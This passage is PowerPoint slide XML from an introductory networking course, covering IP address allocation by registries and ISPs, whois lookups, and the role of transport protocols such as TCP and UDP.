              </a:rPr>
              <a:t> the institution to their nodes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Who assigns prefixes?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Internet Corporation for Assigned Names and Numbers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Allocates large address blocks to Regional Internet Registries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Regional Internet Registries (RIRs)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E.g., ARIN (American Registry for Internet Numbers)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Allocates address blocks within their regions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Allocated to Internet Service Providers and large institutions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Internet Service Providers (ISPs)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Allocate address blocks to their customers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Who may, in turn, allocate to their customers…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{964FAE45-9D71-5345-8314-ED18199F06E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274173" y="637443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2754822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44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44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44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44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449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449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4499">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7449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449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44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FF9F8D-5A11-AD48-94F9-80F125C9FFAE}"/>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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="854018" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B340B6-1C01-B64A-8E33-7361E9A8130C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774597" y="152400"/>
            <a:ext cx="10841182" cy="923348"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Figuring Out Who Owns an Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="854019" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FCB31E5-96E1-6A46-8605-9D6D1350F30D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774597" y="1787236"/>
            <a:ext cx="11055381" cy="4350328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900"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Address registries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Public record of address allocations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Internet Service Providers (ISPs)  should update when giving addresses to customers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However, records are notoriously out-of-date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"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Ways to query</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UNIX: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> –h </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whois.arin.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 128.112.136.35”</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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.arin.net</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whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.geektools.com</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whois.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1197CCBA-6E01-8242-BDF2-D0C1FB9349A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274173" y="6471418"/>
            <a:ext cx="5484194" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adapted from course notes by Jennifer Rexford</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{234012D4-6017-AE40-ABFD-89CCC372BCAD}"/>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669884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lide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DBD5C13-ED00-1A40-9800-AB2FD06BF706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF9E6186-1E6D-A646-A6CA-9BA37031F1EF}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="848898" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2C4D589-7594-DE4E-99C3-28B861CC4588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378858" y="131328"/>
            <a:ext cx="10759017" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Transport Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="848899" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AF87333-5DFE-E745-9162-1D9427DF95D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349250" y="1440872"/>
            <a:ext cx="7023721" cy="5112327"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Provide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> logical communication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> between application processes running on different hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Run on end hosts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sender: breaks application messages into segments, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"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and passes to network layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Receiver: reassembles segments into messages, passes to application layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Multiple transport protocol available to applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCP (reliable buffered messages like http)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP (single packet, unreliable, used by TCP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="848953" name="Object 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84391C3D-B1F0-2B49-83D0-46A85CE36FE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="660884366"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9314484" y="3811873"/>
          <a:ext cx="1304925" cy="1085850"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s43260" name="Clip" r:id="rId4" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="848953" name="Object 57">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84391C3D-B1F0-2B49-83D0-46A85CE36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4484" y="3811873"/>
                        <a:ext cx="13049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00" name="Freeform 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74CE6595-2047-1844-A3F4-866AD9972259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9916145" y="2411698"/>
            <a:ext cx="1798638" cy="1674812"/>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1" name="Freeform 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32B5756-75AB-1440-8360-C0C213D4C5E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8036545" y="2268824"/>
            <a:ext cx="1866900" cy="1589087"/>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2" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B76852C0-8EA3-0D49-B0D1-49949D725CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8404846" y="3719799"/>
            <a:ext cx="2974975" cy="221932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03" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F367CA3-EDE9-A04F-8199-B57CBC1DAACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8154021" y="2403760"/>
            <a:ext cx="733425" cy="319088"/>
            <a:chOff x="3552" y="246"/>
            <a:chExt cx="527" cy="248"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="848904" name="Object 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A30DB10E-85CB-EA4B-B1B6-00AE26B18EAB}"/>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3261" name="Clip" r:id="rId6" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId6" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="848904" name="Object 8">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A30DB10E-85CB-EA4B-B1B6-00AE26B18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05" name="Object 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05BDAD1F-CB17-C144-846A-E65CF2C5FE00}"/>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3262" name="Clip" r:id="rId7" imgW="9131300" imgH="6438900" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId7" imgW="9131300" imgH="6438900" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="848905" name="Object 9">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05BDAD1F-CB17-C144-846A-E65CF2C5FE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06" name="Line 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23F92982-0653-8B48-8EB0-1B78E05E2FD3}"/>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07" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6957659-1F83-5844-981E-0DB96694DB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8154021" y="2999074"/>
            <a:ext cx="733425" cy="319087"/>
            <a:chOff x="3552" y="246"/>
            <a:chExt cx="527" cy="248"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="848908" name="Object 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F00AF16-C6BB-B045-9117-27AD08C3C40A}"/>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3263" name="Clip" r:id="rId9" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId9" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="848908" name="Object 12">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F00AF16-C6BB-B045-9117-27AD08C3C4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09" name="Object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D286FFA-7A62-3043-9C8C-829F44D796D2}"/>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3264" name="Clip" r:id="rId10" imgW="9131300" imgH="6438900" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId10" imgW="9131300" imgH="6438900" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="848909" name="Object 13">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D286FFA-7A62-3043-9C8C-829F44D796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10" name="Line 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624F58EC-1F5C-8E4D-98DC-21EA3D200AEB}"/>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11" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4266375D-03E9-B44C-9411-D477D41A9E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8530258" y="2786348"/>
            <a:ext cx="69850" cy="214312"/>
            <a:chOff x="3842" y="406"/>
            <a:chExt cx="51" cy="167"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="848912" name="Oval 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C58058-AB7B-9B40-9532-EAA154B3F8D5}"/>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3" name="Oval 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4CA5382-684D-4945-B06F-99D18F743F42}"/>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4" name="Oval 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E17DB3E7-3F34-9C4A-800E-D380AA33D03D}"/>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15" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8A3A39E-FC56-C149-87A6-03D1C864514E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9000158" y="3289585"/>
            <a:ext cx="209550" cy="395288"/>
            <a:chOff x="4180" y="783"/>
            <a:chExt cx="150" cy="307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="848916" name="AutoShape 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80042691-9C4A-1E4C-B95E-D911779C69D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7" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0905E76-2246-404E-93D2-B3C40DE532C6}"/>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8" name="Rectangle 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC7D222-D332-AB40-88BC-E5CD535EF43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9" name="AutoShape 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5911A4C8-219B-A04B-9F2F-B73F021189ED}"/>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0" name="Line 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C93B732B-6C94-7040-9C15-7A2777791177}"/>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1" name="Line 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BC620ED-8D31-4641-8288-1041B01A3279}"/>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2" name="Rectangle 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0E8EA3A-A3E8-CE47-A5D3-D089504F1E45}"/>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3" name="Rectangle 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B758A173-191E-8544-BDB3-190FA68FAD78}"/>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24" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D813F63A-987D-B649-891C-7A6F61C3107C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="9312896" y="3367373"/>
            <a:ext cx="80962" cy="233363"/>
            <a:chOff x="3842" y="406"/>
            <a:chExt cx="51" cy="167"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="848925" name="Oval 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1FB294F-A0B6-264D-9B65-C00288B458E9}"/>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6" name="Oval 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
